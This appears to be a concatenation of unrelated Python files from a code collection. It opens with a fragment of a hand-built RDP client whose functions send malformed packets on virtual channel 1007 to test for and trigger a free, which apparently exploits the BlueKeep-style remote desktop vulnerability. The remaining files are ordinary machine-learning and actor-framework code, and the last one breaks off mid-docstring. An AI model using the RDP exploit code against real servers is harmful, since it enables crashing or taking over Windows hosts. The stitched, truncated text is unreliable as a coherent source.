packet = binascii.unhexlify('a4011300ee03ea030100ea0306008e014d53545343000e00000001001800010003000002000000000c04000000000000000002001c00ffff01000100010020035802000001000100000001000000030058000000000000000000000000000000000000000000010014000000010047012a000101010100000000010101010001010000000000010101000001010100000000a1060000000000000084030000000000e40400001300280000000003780000007800000050010000000000000000000000000000000000000000000008000a000100140014000a0008000600000007000c00000000000000000005000c00000000000200020009000800000000000f000800010000000d005800010000000904000004000000000000000c000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000c000800010000000e0008000100000010003400fe000400fe000400fe000800fe000800fe001000fe002000fe004000fe008000fe000001400000080001000102000000')
packet_sig = crypter.sign(packet)
packet_enc = crypter.encrypt(packet)
return packet_hdr + sec_hdr + packet_sig + packet_enc
# send client sync
def client_sync(crypter):
packet_hdr = binascii.unhexlify('0300003102f08064000503eb708022')
sec_hdr = binascii.unhexlify('08000000')
packet = binascii.unhexlify('16001700ee03ea030100000108001f0000000100ea03')
packet_sig = crypter.sign(packet)
packet_enc = crypter.encrypt(packet)
return packet_hdr + sec_hdr + packet_sig + packet_enc
# send client cooperate
def client_cooperate(crypter):
packet_hdr = binascii.unhexlify('0300003502f08064000503eb708026')
sec_hdr = binascii.unhexlify('08000000')
packet = binascii.unhexlify('1a001700ee03ea03010000010c00140000000400000000000000')
packet_sig = crypter.sign(packet)
packet_enc = crypter.encrypt(packet)
return packet_hdr + sec_hdr + packet_sig + packet_enc
# send client control request
def client_control_req(crypter):
packet_hdr = binascii.unhexlify('0300003502f08064000503eb708026')
sec_hdr = binascii.unhexlify('08000000')
packet = binascii.unhexlify('1a001700ee03ea03010000010c00140000000100000000000000')
packet_sig = crypter.sign(packet)
packet_enc = crypter.encrypt(packet)
return packet_hdr + sec_hdr + packet_sig + packet_enc
# send client persistent key length
def client_persistent_key_len(crypter):
packet_hdr = binascii.unhexlify('0300003d02f08064000503eb70802e')
sec_hdr = binascii.unhexlify('08000000')
packet = binascii.unhexlify('22001700ee03ea030100000114001c00000001000000000000000000000000000000')
packet_sig = crypter.sign(packet)
packet_enc = crypter.encrypt(packet)
return packet_hdr + sec_hdr + packet_sig + packet_enc
# send client font list
def client_font_list(crypter):
packet_hdr = binascii.unhexlify('0300003502f08064000503eb708026')
sec_hdr = binascii.unhexlify('08000000')
packet = binascii.unhexlify('1a001700ee03ea03010000010c00270000000000000003003200')
packet_sig = crypter.sign(packet)
packet_enc = crypter.encrypt(packet)
return packet_hdr + sec_hdr + packet_sig + packet_enc
def send_dc():
return binascii.unhexlify('0300000b06800000000000')
# params
# initiator is two byte channel initiator
# channelid is two byte channel id
# virt_chan_data is data to send
def write_virtual_channel(crypter, initiator, channelId, virt_chan_data):
tpkt = binascii.unhexlify('0300') # still require two bytes for size
x224 = binascii.unhexlify('02f080')
mcs_pdu = binascii.unhexlify('64')
mcs_pdu += struct.pack('>H', initiator)
mcs_pdu += struct.pack('>H', channelId)
mcs_pdu += binascii.unhexlify('70') # flags had 80
sec_hdr = binascii.unhexlify('08000000')
# channel_pdu_flags = binascii.unhexlify('03000000') # original
channel_pdu_flags = binascii.unhexlify('42424242')
# the len is not correct
channel_pdu_hdr = struct.pack('<I', len(virt_chan_data)) + channel_pdu_flags
virt_chan_pdu = channel_pdu_hdr + virt_chan_data
packet_sig = crypter.sign(virt_chan_pdu)
virt_chan_pdu_enc = crypter.encrypt(virt_chan_pdu)
send_data = sec_hdr + packet_sig + virt_chan_pdu_enc
mcs_pdu_size = struct.pack('>H', len(send_data)+0x8000)
#print('mcs_pdu_size')
#print(binascii.hexlify(mcs_pdu_size))
mcs_pdu += mcs_pdu_size
to_send = x224 + mcs_pdu + send_data
#add 4 for tpkt hdr/size
total_size = len(to_send) + 4
tpkt += struct.pack('>H', total_size) + to_send
#print('len of tpkt')
#print(binascii.hexlify(struct.pack('>H', total_size)))
#print(binascii.hexlify(tpkt))
return tpkt
def test_if_vuln_32(crypter):
to_send = binascii.unhexlify('00000000020000000000000000000000')
return write_virtual_channel(crypter, 7, 1007, to_send)
def test_if_vuln_64(crypter):
to_send = binascii.unhexlify('0000000000000000020000000000000000000000000000000000000000000000')
return write_virtual_channel(crypter, 7, 1007, to_send)
def free_32(crypter):
# packet_hdr = binascii.unhexlify('0300003502f08064000703ef708026')
# sec_hdr = binascii.unhexlify('08000000')
# packet = binascii.unhexlify('1200000003000000000000000200000000000000000000005A5A')
# packet_sig = crypter.sign(packet)
# packet_enc = crypter.encrypt(packet)
# return packet_hdr + sec_hdr + packet_sig + packet_enc
to_send = binascii.unhexlify('000000000200000000000000000000005A5A')
return write_virtual_channel(crypter, 7, 1007, to_send)
def free_64(crypter):
to_send = binascii.unhexlify('00000000000000000200000000000000000000000000000000000000000000005A5A')
return write_virtual_channel(crypter, 7, 1007, to_send)
def get_ran_name():
name = ''.join(random.choice(string.ascii_lowercase) for i in range(8))
return name.encode('utf-8')
# commence janky parsing
# might be useful
def get_tpkt_size(tpkt):
return int.from_bytes(tpkt[2:4], byteorder='big')
def read_rdp_data(s, crypter):
resp = b''
while True:
resp = resp + s.recv(8192)
len_msg = len(resp)
tpkt_offset = resp.find(b'\x03\x00')
size = get_tpkt_size(resp[tpkt_offset:tpkt_offset+4])
if size <= len_msg:
parse_data(crypter, resp[tpkt_offset:tpkt_offset+size])
resp = resp[tpkt_offset+size:]
def get_data(crypter, data):
data_len = len(data)
print('len of data = %d' % data_len)
tpkt = data[0:4]
if tpkt[0] != 3:
print('Error not tpkt')
return
size = int.from_bytes(tpkt[2:4], byteorder='big')
print('size = %d' % size)
parse_data(crypter, data[:size])
parsed = size
while parsed < data_len:
tpkt = data[parsed:parsed+4]
if tpkt[0] != 3:
print('Error not tpkt')
return
size = int.from_bytes(tpkt[2:4], byteorder='big')
parse_data(crypter, data[parsed:parsed+size])
parsed = parsed + size
def parse_data(crypter, data):
tpkt = data[0:4]
ctop = data[4:7]
# PDU
pdu_type = data[7:8]
initiator = data[8:10]
channel_id = data[10:12]
print('data from %d to channel id = %d' % (int.from_bytes(initiator, byteorder='big'), int.from_bytes(channel_id, byteorder='big')))
sec_hdr_offset = data.find(b'\x08\x00\x00\x00')
sec_hdr = data[sec_hdr_offset:sec_hdr_offset+4]
print('sec_hdr: %s' % binascii.hexlify(sec_hdr))
sig = data[sec_hdr_offset+4:sec_hdr_offset+12]
print('sig: %s' % binascii.hexlify(sig))
enc_data = data[sec_hdr_offset+12:]
print('enc_data: %s' % binascii.hexlify(enc_data))
print('decrypted data: %s' % binascii.hexlify(crypter.decrypt(enc_data)))
def connect(s):
name = get_ran_name()
print('[+] initializing connection')
# x.224 connection initiation
s.sendall(connect_req(name))
s.recv(4096)
print('[+] sending basic settings exchange')
# basic settings exchange
s.sendall(mcs_connect_init_pdu())
p = s.recv(4096)
time.sleep(.25)
server_ran, pub_key, bit_len = parse_mcs_conn_resp(p)
client_ran = b'A'*32
# channel connection
print('[+] sending erect domain and attach user')
s.sendall(erect_domain_req())
s.sendall(attach_user_req())
time.sleep(.25)
s.recv(4096)
print('[+] sending channel join requests')
# join requests
channels = get_chan_join_req()
for channel in channels:
s.sendall(binascii.unhexlify(channel))
s.recv(4096)
print('[+] sending security exchange')
# security exchange
s.sendall(sec_exchange(pub_key, bit_len))
time.sleep(.5)
non_fips = rdp_crypto.non_fips(server_ran, client_ran)
crypter = rdp_crypto.rc4_crypter(non_fips)
# client info pdu
s.sendall(client_info(crypter, name))
s.recv(4096)
time.sleep(.5)
# encrypted data begins here
resp = s.recv(8192)
# get_data(crypter, resp)
# print('[+] finalizing connection sequence')
print('[+] sending client confirm')
# send client confirm active pdu
s.sendall(client_confirm(crypter))
time.sleep(.15)
resp = s.recv(8192)
# get_data(crypter, resp)
# send client sync
print('[+] sending client sync')
s.sendall(client_sync(crypter))
time.sleep(.15)
# send client cooperate
print('[+] sending client cooperate')
s.sendall(client_cooperate(crypter))
time.sleep(.15)
# send client control request
print('[+] sending client control req')
s.sendall(client_control_req(crypter))
time.sleep(.15)
resp = s.recv(8192)
# get_data(crypter, resp)
# send client persistent key length
print('[+] sending persistent key len')
s.sendall(client_persistent_key_len(crypter))
time.sleep(.15)
# send client font list
print('[+] sending client font list')
s.sendall(client_font_list(crypter))
print('[+] connection established')
# read_rdp_data(s, crypter)
return crypter
|
501741 | from abc import ABCMeta, abstractmethod
from datetime import timedelta
from examples.cluster_grain_hello_world.messages.protos_pb2 import HelloRequest, HelloResponse
from protoactor.actor.actor_context import Actor, AbstractContext, RootContext, GlobalRootContext
from protoactor.actor.cancel_token import CancelToken
from protoactor.actor.messages import Started, ReceiveTimeout
from protoactor.actor.props import Props
from protoactor.remote.remote import Remote
from protoactor.remote.response import ResponseStatusCode
from protoactor.cluster.grain_call_options import GrainCallOptions
from protoactor.cluster.protos_pb2 import GrainRequest, GrainResponse, GrainErrorResponse
from protoactor.cluster.сluster import Cluster
class AbstractHelloGrain(metaclass=ABCMeta):
@abstractmethod
def say_hello(self, request: HelloRequest) -> HelloResponse:
raise NotImplementedError('Should implement this method')
class HelloGrainClient():
def __init__(self, grain_id: str):
self._grain_id = grain_id
async def say_hello(self, request: HelloRequest, ct: CancelToken = None,
options: GrainCallOptions = None) -> HelloResponse:
if options is None:
options = GrainCallOptions()
grain_request = GrainRequest(method_index=0,
message_data=request.SerializeToString())
async def inner() -> HelloResponse:
# resolve the grain
pid, status_code = await Cluster.get_async(self._grain_id, 'HelloGrain', ct)
if status_code != ResponseStatusCode.OK:
raise Exception(f'Get PID failed with StatusCode: {status_code}')
# request the RPC method to be invoked
grain_response = await GlobalRootContext.request_future(pid, grain_request, ct)
# did we get a response
if isinstance(grain_response, GrainResponse):
return HelloResponse.ParseFromString(grain_response.message_data)
# did we get an error response
if isinstance(grain_response, GrainErrorResponse):
raise Exception(grain_response.err)
raise AttributeError()
for i in range(options.retry_count):
try:
return await inner()
except Exception:
if options.retry_action is not None:
await options.retry_action(i)
return await inner()
class HelloGrainActor(Actor):
def __init__(self):
self._inner = None
async def receive(self, context: AbstractContext) -> None:
message = context.message
if isinstance(message, Started):
self._inner = Grains._hello_grain_factory
context.set_receive_timeout(timedelta(seconds=30))
elif isinstance(message, ReceiveTimeout):
await context.my_self.stop()
elif isinstance(message, GrainRequest):
if message.method_index == 0:
request = HelloRequest.ParseFromString(message.message_data)
try:
response = await self._inner.say_hello(request)
grain_response = GrainResponse(message_data=response.SerializeToString())
await context.respond(grain_response)
except Exception as ex:
grain_error_response = GrainErrorResponse(err=str(ex))
await context.respond(grain_error_response)
class Grains():
def __init__(self):
self._hello_grain_factory = None
def hello_grain_factory(self, factory: AbstractHelloGrain) -> None:
self._hello_grain_factory = factory
Remote().register_known_kind('HelloGrain', Props().from_producer(lambda: HelloGrainActor()))
def hello_grain_client(self, grain_id: str) -> HelloGrainClient:
return HelloGrainClient(grain_id)
|
501744 | import pandas as pd
import swifter # noqa
from nlp_profiler.constants import DEFAULT_PARALLEL_METHOD, SWIFTER_METHOD
from nlp_profiler.generate_features.parallelisation_methods \
import get_progress_bar, using_joblib_parallel, using_swifter
def generate_features(main_header: str,
high_level_features_steps: list,
new_dataframe: pd.DataFrame,
parallelisation_method: str = DEFAULT_PARALLEL_METHOD):
generate_feature_progress_bar = get_progress_bar(high_level_features_steps)
# Using swifter or Using joblib Parallel and delay method:
parallelisation_method_function = using_joblib_parallel
if parallelisation_method == SWIFTER_METHOD:
parallelisation_method_function = using_swifter
for _, (new_column, source_column, transformation_function) in \
enumerate(generate_feature_progress_bar):
source_field = new_dataframe[source_column]
generate_feature_progress_bar.set_description(
f'{main_header}: {source_column} => {new_column}'
)
new_dataframe[new_column] = parallelisation_method_function(
source_field, transformation_function, new_column
)
|
501747 | import os, argparse, imageio
import jittor as jt
from jittor import nn
from lib.Network_Res2Net_GRA_NCD import Network
from utils.data_val import test_dataset
jt.flags.use_cuda = 1
parser = argparse.ArgumentParser()
parser.add_argument('--testsize', type=int, default=352, help='testing size')
parser.add_argument('--pth_path', type=str, default='./snapshot/Net_epoch_best.pkl')
opt = parser.parse_args()
for _data_name in ['CAMO', 'COD10K', 'CHAMELEON', 'NC4K']:
data_path = './Dataset/TestDataset/{}/'.format(_data_name)
save_path = './res/{}/{}/'.format(opt.pth_path.split('/')[(- 2)], _data_name)
model = Network()
model.load(opt.pth_path)
model.eval()
os.makedirs(save_path, exist_ok=True)
image_root = '{}/Imgs/'.format(data_path)
gt_root = '{}/GT/'.format(data_path)
test_loader = test_dataset(image_root, gt_root, opt.testsize)\
.set_attrs(batch_size=1, shuffle=False)
for image, gt, name, _ in test_loader:
gt /= (gt.max() + 1e-08)
(res5, res4, res3, res2) = model(image)
res = res2
c, h, w = gt.shape
upsample = nn.upsample(res, size=(h, w), mode='bilinear')
res = res.sigmoid().data.squeeze()
res = ((res - res.min()) / ((res.max() - res.min()) + 1e-08))
print('> {} - {}'.format(_data_name, name))
imageio.imwrite((save_path + name[0]), res) |
501770 | from utils.load_snips import SNIPS
from collections import defaultdict
import json
from tqdm import tqdm
def predict(args,tokenizer,model,train, test, slots):
base_prefixes = defaultdict(str)
for slot in slots:
for _, b in enumerate(train[slot]):
base_prefixes[slot] += f"{b[0]}=>{slot}={b[1]}\n"
total_results = {}
for idx_b, b in tqdm(enumerate(test),total=len(test)):
result = {}
sequence_slot = {}
for slot, base_prefix in base_prefixes.items():
# print("SLOT:",slot)
prefix = base_prefix+f"{b[0]}=>{slot}="
encoded_prompt = tokenizer.encode(prefix, add_special_tokens=False, return_tensors="pt")
input_ids = encoded_prompt.to(args.device)
output_sequences = model.generate(
input_ids=input_ids,
max_length=args.length + len(encoded_prompt[0]),
temperature=args.temperature,
top_k=args.k,
top_p=args.p,
repetition_penalty=args.repetition_penalty,
do_sample=True,
num_return_sequences=args.num_return_sequences,
)
# Remove the batch dimension when returning multiple sequences
if len(output_sequences.shape) > 2:
output_sequences.squeeze_()
generated_sequences = []
generated_answers = []
for _, generated_sequence in enumerate(output_sequences):
# print("=== GENERATED SEQUENCE {} ===".format(generated_sequence_idx + 1))
generated_sequence = generated_sequence.tolist()
# Decode text
text = tokenizer.decode(generated_sequence, clean_up_tokenization_spaces=True)
# Remove all text after the stop token
# text = text[: text.find(args.stop_token) if args.stop_token else None]
generated_answers.append(text[len(tokenizer.decode(encoded_prompt[0], clean_up_tokenization_spaces=True)) :])
# Add the prompt at the beginning of the sequence. Remove the excess text that was used for pre-processing
total_sequence = (
prefix + text[len(tokenizer.decode(encoded_prompt[0], clean_up_tokenization_spaces=True)) :]
)
generated_sequences.append(total_sequence)
rep = generated_answers[0].lower()
result[slot] = rep[:rep.find("\n")] ## cleaning
sequence_slot[slot] = total_sequence
total_results[idx_b] = {"PRED":result, "query":sequence_slot, "text":b[0],"TAGS":b[1],"GOLD":b[2]}
# if(idx_b==10):break
return total_results
def SNIPS_slot(args,tokenizer,model):
shot = args.shots
domain_set = ["AddToPlaylist", "BookRestaurant", "GetWeather",
"PlayMusic", "RateBook", "SearchCreativeWork",
"SearchScreeningEvent"]
for d in domain_set:
print(f"Domain:{d}")
train, test, slots = SNIPS(args,domain=d,shots=shot)
results = predict(args,tokenizer,model,train, test, slots)
results = {"meta":str(args), "results":results}
with open(f"results/{args.model_name_or_path}_{args.shots}_{d}_{args.balanced}.json", "w", encoding="utf-8") as f:
json.dump(results,f,indent=4) |
501792 | import numpy as np
import cv2
import tensorflow as tf
class Evaluator(object):
def __init__(self, config):
self.mutual_check = True
self.err_thld = config['err_thld']
self.matches = self.bf_matcher_graph()
self.stats = {
'i_eval_stats': np.array((0, 0, 0, 0, 0, 0, 0, 0), np.float32),
'v_eval_stats': np.array((0, 0, 0, 0, 0, 0, 0, 0), np.float32),
'all_eval_stats': np.array((0, 0, 0, 0, 0, 0, 0, 0), np.float32),
}
def homo_trans(self, coord, H):
kpt_num = coord.shape[0]
homo_coord = np.concatenate((coord, np.ones((kpt_num, 1))), axis=-1)
proj_coord = np.matmul(H, homo_coord.T).T
proj_coord = proj_coord / proj_coord[:, 2][..., None]
proj_coord = proj_coord[:, 0:2]
return proj_coord
def bf_matcher_graph(self):
descriptors_a = tf.compat.v1.placeholder(tf.float32, (None, None), 'descriptor_a')
descriptors_b = tf.compat.v1.placeholder(tf.float32, (None, None), 'descriptor_b')
sim = tf.linalg.matmul(descriptors_a, descriptors_b, transpose_b=True)
ids1 = tf.range(0, tf.shape(sim)[0])
nn12 = tf.math.argmax(sim, axis=1, output_type=tf.int32)
if self.mutual_check:
nn21 = tf.math.argmax(sim, axis=0, output_type=tf.int32)
mask = tf.equal(ids1, tf.gather(nn21, nn12))
matches = tf.stack([tf.boolean_mask(ids1, mask), tf.boolean_mask(nn12, mask)])
else:
matches = tf.stack([ids1, nn12])
return matches
def mnn_matcher(self, sess, descriptors_a, descriptors_b):
input_dict = {
"descriptor_a:0": descriptors_a,
"descriptor_b:0": descriptors_b
}
matches = sess.run(self.matches, input_dict)
return matches.T
def feature_matcher(self, sess, ref_feat, test_feat):
matches = self.mnn_matcher(sess, ref_feat, test_feat)
matches = [cv2.DMatch(matches[i][0], matches[i][1], 0) for i in range(matches.shape[0])]
return matches
def get_covisible_mask(self, ref_coord, test_coord, ref_img_shape, test_img_shape, gt_homo, scaling=1.):
ref_coord = ref_coord / scaling
test_coord = test_coord / scaling
proj_ref_coord = self.homo_trans(ref_coord, gt_homo)
proj_test_coord = self.homo_trans(test_coord, np.linalg.inv(gt_homo))
ref_mask = np.logical_and(
np.logical_and(proj_ref_coord[:, 0] < test_img_shape[1] - 1,
proj_ref_coord[:, 1] < test_img_shape[0] - 1),
np.logical_and(proj_ref_coord[:, 0] > 0, proj_ref_coord[:, 1] > 0)
)
test_mask = np.logical_and(
np.logical_and(proj_test_coord[:, 0] < ref_img_shape[1] - 1,
proj_test_coord[:, 1] < ref_img_shape[0] - 1),
np.logical_and(proj_test_coord[:, 0] > 0, proj_test_coord[:, 1] > 0)
)
return ref_mask, test_mask
def get_inlier_matches(self, ref_coord, test_coord, putative_matches, gt_homo, scaling=1.):
p_ref_coord = np.float32([ref_coord[m.queryIdx] for m in putative_matches]) / scaling
p_test_coord = np.float32([test_coord[m.trainIdx] for m in putative_matches]) / scaling
proj_p_ref_coord = self.homo_trans(p_ref_coord, gt_homo)
dist = np.sqrt(np.sum(np.square(proj_p_ref_coord - p_test_coord[:, 0:2]), axis=-1))
inlier_mask = dist <= self.err_thld
inlier_matches = [putative_matches[z] for z in np.nonzero(inlier_mask)[0]]
return inlier_matches
def get_gt_matches(self, ref_coord, test_coord, gt_homo, scaling=1.):
ref_coord = ref_coord / scaling
test_coord = test_coord / scaling
proj_ref_coord = self.homo_trans(ref_coord, gt_homo)
pt0 = np.expand_dims(proj_ref_coord, axis=1)
pt1 = np.expand_dims(test_coord, axis=0)
norm = np.linalg.norm(pt0 - pt1, ord=None, axis=2)
min_dist0 = np.min(norm, axis=1)
min_dist1 = np.min(norm, axis=0)
gt_num0 = np.sum(min_dist0 <= self.err_thld)
gt_num1 = np.sum(min_dist1 <= self.err_thld)
gt_num = (gt_num0 + gt_num1) / 2
return gt_num
def compute_homography_accuracy(self, ref_coord, test_coord, ref_img_shape, putative_matches, gt_homo, scaling=1.):
ref_coord = np.float32([ref_coord[m.queryIdx] for m in putative_matches]) / scaling
test_coord = np.float32([test_coord[m.trainIdx] for m in putative_matches]) / scaling
pred_homo, _ = cv2.findHomography(ref_coord, test_coord, cv2.RANSAC)
if pred_homo is None:
correctness = 0
else:
corners = np.array([[0, 0],
[ref_img_shape[1] / scaling - 1, 0],
[0, ref_img_shape[0] / scaling - 1],
[ref_img_shape[1] / scaling - 1, ref_img_shape[0] / scaling - 1]])
real_warped_corners = self.homo_trans(corners, gt_homo)
warped_corners = self.homo_trans(corners, pred_homo)
mean_dist = np.mean(np.linalg.norm(real_warped_corners - warped_corners, axis=1))
correctness = float(mean_dist <= self.err_thld)
return correctness
def print_stats(self, key):
avg_stats = self.stats[key] / max(self.stats[key][0], 1)
avg_stats = avg_stats[1:]
print('----------%s----------' % key)
print('avg_n_feat', int(avg_stats[0]))
print('avg_rep', avg_stats[1])
print('avg_precision', avg_stats[2])
print('avg_matching_score', avg_stats[3])
print('avg_recall', avg_stats[4])
print('avg_MMA', avg_stats[5])
print('avg_homography_accuracy', avg_stats[6]) |
501804 | import os.path as osp
import cv2
import numpy as np
from detecting.datasets import transforms, utils
import glob
import xml.etree.ElementTree as ET
class VocDataSet(object):
def __init__(self, dataset_dir, subset,
flip_ratio=0,
pad_mode='fixed',
mean=(0, 0, 0),
std=(1, 1, 1),
scale=(1024, 800),
keep_aspect = False,
classes = '',
image_dir = '',
label_dir = '',
debug=False):
'''Load a subset of the VOC dataset.
Attributes
---
dataset_dir: The root directory of the VOC dataset.
subset: What to load (train, test).
flip_ratio: Float. The ratio of flipping an image and its bounding boxes.
pad_mode: Which padded method to use (fixed, non-fixed)
mean: Tuple. Image mean.
std: Tuple. Image standard deviation.
scale: Tuple of two integers.
---
dataset_dir: VOC数据集存放位置
subset: 载入训练集还是验证集(train, test)
flip_ratio: 图片翻转的概率
pad_mode: 哪一种padded method,(fixed, non-fixed)
mean: 图片均值
std: 图片标准差
scale: 图片大小
'''
# subset必须为['train', 'test']
if subset not in ['train', 'test']:
raise AssertionError('subset must be "train" or "test".')
if not classes:
# 20个种类+背景
self._classes = ('__background__', # always index 0
'aeroplane', 'bicycle', 'bird', 'boat',
'bottle', 'bus', 'car', 'cat', 'chair',
'cow', 'diningtable', 'dog', 'horse',
'motorbike', 'person', 'pottedplant',
'sheep', 'sofa', 'train', 'tvmonitor')
else:
self._classes = classes
if not image_dir:
# 图片保存路径
self.image_dir = "{}/{}/VOC2007/JPEGImages".format(dataset_dir, subset)
else:
self.image_dir = image_dir
if not label_dir:
# 标签保存路径
self.label_dir = "{}/{}/VOC2007/Annotations".format(dataset_dir, subset)
else:
self.label_dir = label_dir
# 物体名称对应编号的字典
self._class_to_ind = dict(zip(self._classes, range(len(self._classes))))
# 获得图片标签信息
self.img_infos = self._load_ann_info(self.label_dir)
# 图片翻转的概率
self.flip_ratio = flip_ratio
# pad模式
if pad_mode in ['fixed', 'non-fixed']:
self.pad_mode = pad_mode
elif subset == 'train':
self.pad_mode = 'fixed'
else:
self.pad_mode = 'non-fixed'
self.keep_aspect = keep_aspect
# ImageTransform用于处理图片
self.img_transform = transforms.ImageTransform(scale, mean, std, pad_mode, self.keep_aspect)
# BboxTransform用于处理标签
self.bbox_transform = transforms.BboxTransform()
# 获得图片标签信息
def _load_ann_info(self, ann_path, min_size=32):
# 用于保存图片信息
img_infos = []
# 循环路径下所有xml文件
for xml_file in glob.glob(ann_path + '/*.xml'):
# 保存标注框坐标
gt_bboxes = []
# 保存标注框标签
gt_labels = []
# xml文件解析
tree = ET.parse(xml_file)
root = tree.getroot()
# 图片名
filename = root.find('filename').text
# 图片宽度
width = int(root.find('size')[0].text)
# 图片高度
height = int(root.find('size')[1].text)
# 图片通道数
depth = int(root.find('size')[2].text)
# 图片shape为(height,width,depth)
shape = (height,width,depth)
# 循环该图片中的标注
for member in root.findall('object'):
# 类别名称
class_name = member.find('name').text
# 坐标
x1 = float(member.find('bndbox')[0].text)
y1 = float(member.find('bndbox')[1].text)
x2 = float(member.find('bndbox')[2].text)
y2 = float(member.find('bndbox')[3].text)
# 计算标注框框高度
h = y2 - y1
# 计算标注框宽度
w = x2 - x1
# 如果宽度,高度存在异常则跳过该标注
if w < 1 or h < 1:
continue
# 标注框左上角坐标和右下角坐标
bbox = [y1, x1, y2, x2]
# 保存标注框坐标
gt_bboxes.append(bbox)
# 保存标注框对应标签
gt_labels.append(self._class_to_ind[class_name])
# 定义数据类型
if gt_bboxes:
gt_bboxes = np.array(gt_bboxes, dtype=np.float32)
gt_labels = np.array(gt_labels, dtype=np.int64)
else:
gt_bboxes = np.zeros((0, 4), dtype=np.float32)
gt_labels = np.array([], dtype=np.int64)
# 把file_name,gt_bboxes,gt_labels存入字典
info = dict(file_name=filename,
width=width,
height=height,
depth=depth,
shape=shape,
bboxes=gt_bboxes,
labels=gt_labels)
# 如果图片长宽都大于最小size,并且ann中有标签值
if min(info['width'], info['height']) >= min_size and info['labels'].shape[0] != 0:
# 保存该图片的信息
img_infos.append(info)
return img_infos
# 返回图片数量
def __len__(self):
return len(self.img_infos)
# 用于实现迭代功能
def __getitem__(self, idx):
'''Load the image and its bboxes for the given index.
Args
---
idx: the index of images.
Returns
---
tuple: A tuple containing the following items: image,
bboxes, labels.
'''
# 图片信息
img_info = self.img_infos[idx]
# 读取图片
img = cv2.imread(osp.join(self.image_dir, img_info['file_name']), cv2.IMREAD_COLOR)
# BGR转RGB
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
# 获得图片shape
ori_shape = img.shape
# 获得单个对象的标注框坐标
bboxes = img_info['bboxes']
# 获得单个对象的标注框标签
labels = img_info['labels']
# 是否进行翻转
flip = True if np.random.rand() < self.flip_ratio else False
# 处理图片数据
# 得到填充后的图片,resize后图片shape,缩放因子
img, img_shape, scale_factor = self.img_transform(img, flip)
# 填充后的图片shape
pad_shape = img.shape
# 处理标注框数据
trans_bboxes, labels = self.bbox_transform(
bboxes, labels, img_shape, scale_factor, flip)
# 保存原始图片shape
# resize后的图片shape
# 填充后的图片shape
# 缩放因子
# 是否翻转
img_meta_dict = dict({
'ori_shape': ori_shape,
'img_shape': img_shape,
'pad_shape': pad_shape,
'scale_factor': scale_factor,
'flip': flip
})
# 把img_meta_dict中的数据组成1维的array
img_meta = utils.compose_image_meta(img_meta_dict)
# 返回处理后的图片数据,图片相关的一些信息,图片中的标注框坐标,标注框标签
return img, img_meta, trans_bboxes, labels
# 获得所有类别的名称
def get_categories(self):
return self._classes
|
501839 | import tensorflow as tf
from tensorflow.keras import Model
from tensorflow.keras.layers import Layer
from tensorflow.keras import Sequential
import tensorflow.keras.layers as nn
from einops import rearrange, repeat
from vit import ViT
from t2t import T2TViT
from efficient import ViT as EfficientViT
def exists(val):
return val is not None
class DistillMixin:
def call(self, img, distill_token=None, training=True):
distilling = exists(distill_token)
x = self.patch_embedding(img)
b, n, d = x.shape
cls_tokens = repeat(self.cls_token, '() n d -> b n d', b=b)
x = tf.concat([cls_tokens, x], axis=1)
x += self.pos_embedding[:, :(n + 1)]
if distilling:
distill_tokens = repeat(distill_token, '() n d -> b n d', b = b)
x = tf.concat([x, distill_tokens], axis=1)
x = self._attend(x, training=training)
if distilling:
x, distill_tokens = x[:, :-1], x[:, -1]
if self.pool == 'mean':
x = tf.reduce_mean(x, axis=1)
else:
x = x[:, 0]
x = self.mlp_head(x)
if distilling:
return x, distill_tokens
else:
return x
class DistillableViT(DistillMixin, ViT):
def __init__(self, *args, **kwargs):
super(DistillableViT, self).__init__(*args, **kwargs)
self.args = args
self.kwargs = kwargs
self.dim = kwargs['dim']
self.num_classes = kwargs['num_classes']
def _attend(self, x, training=True):
x = self.dropout(x, training=training)
x = self.transformer(x, training=training)
return x
class DistillableT2TViT(DistillMixin, T2TViT):
def __init__(self, *args, **kwargs):
super(DistillableT2TViT, self).__init__(*args, **kwargs)
self.args = args
self.kwargs = kwargs
self.dim = kwargs['dim']
self.num_classes = kwargs['num_classes']
def _attend(self, x, training=True):
x = self.dropout(x, training=training)
x = self.transformer(x, training=training)
return x
class DistillableEfficientViT(DistillMixin, EfficientViT):
def __init__(self, *args, **kwargs):
super(DistillableEfficientViT, self).__init__(*args, **kwargs)
self.args = args
self.kwargs = kwargs
self.dim = kwargs['dim']
self.num_classes = kwargs['num_classes']
def _attend(self, x, training=True):
x = self.dropout(x, training=training)
x = self.transformer(x, training=training)
return x
class DistillWrapper(Model):
def __init__(self, teacher, student, temperature=1.0, alpha=0.5, hard=False):
super(DistillWrapper, self).__init__()
assert (isinstance(student, (DistillableViT, DistillableT2TViT, DistillableEfficientViT))), 'student must be a vision transformer'
self.teacher = teacher
self.student = student
dim = student.dim
num_classes = student.num_classes
self.temperature = temperature
self.alpha = alpha
self.hard = hard
self.distillation_token = tf.Variable(tf.random.normal([1, 1, dim]))
self.distill_mlp = Sequential([
nn.LayerNormalization(),
nn.Dense(units=num_classes)
], name='distill_mlp')
def call(self, inputs, temperature=None, alpha=None, training=True, **kwargs):
img, labels = inputs
b, *_ = img.shape
alpha = alpha if exists(alpha) else self.alpha
T = temperature if exists(temperature) else self.temperature
teacher_logits = tf.stop_gradient(self.teacher(img, training=training))
student_logits, distill_tokens = self.student(img, distill_token=self.distillation_token, training=training)
distill_logits = self.distill_mlp(distill_tokens)
loss = tf.keras.losses.categorical_crossentropy(y_true=labels, y_pred=student_logits, from_logits=True)
if not self.hard:
x = tf.nn.log_softmax(distill_logits / T, axis=-1)
y = tf.nn.softmax(teacher_logits / T, axis=-1)
distill_loss = tf.keras.losses.KLDivergence(reduction=tf.keras.losses.Reduction.NONE)(y_true=y, y_pred=x)
batch = distill_loss.shape[0]
distill_loss = tf.reduce_sum(distill_loss) / batch
distill_loss *= T ** 2
else:
teacher_labels = tf.argmax(teacher_logits, axis=-1)
distill_loss = tf.keras.losses.categorical_crossentropy(y_true=teacher_labels, y_pred=distill_logits, from_logits=True)
return loss * (1 - alpha) + distill_loss * alpha
""" Usage
teacher = tf.keras.applications.resnet50.ResNet50()
v = DistillableViT(
image_size = 256,
patch_size = 32,
num_classes = 1000,
dim = 1024,
depth = 6,
heads = 8,
mlp_dim = 2048,
dropout = 0.1,
emb_dropout = 0.1
)
distiller = DistillWrapper(
student = v,
teacher = teacher,
temperature = 3, # temperature of distillation
alpha = 0.5, # trade between main loss and distillation loss
hard = False # whether to use soft or hard distillation
)
img = tf.random.normal([2, 256, 256, 3])
